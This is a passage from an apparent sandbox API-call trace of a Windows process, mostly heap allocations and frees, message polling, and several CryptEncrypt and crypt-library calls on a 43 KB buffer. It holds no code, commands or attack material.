(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.663] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0197.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0197.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0197.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0197.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0197.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0197.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0197.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0197.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.664] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0197.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0197.666] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0197.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0197.666] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0197.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0197.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0197.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0197.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0197.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0197.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0197.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0197.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0197.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0197.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0197.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0197.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0197.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0197.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0197.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0197.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0197.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0197.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0197.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0197.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0197.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0197.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0197.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0197.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0197.671] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2778, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2778*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0197.671] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.671] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.672] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0197.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0197.672] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0197.672] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.672] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.672] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0197.672] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.672] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0197.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0197.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.674] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xab3a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xab40) returned 1 [0197.674] CharLowerBuffW (in: lpsz="byte[43841]", cchLength=0xb | out: lpsz="byte[43841]") returned 0xb [0197.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.678] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xab3a, dwBufLen=0xab40 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xab40) returned 1 [0197.680] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0197.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.691] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0197.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 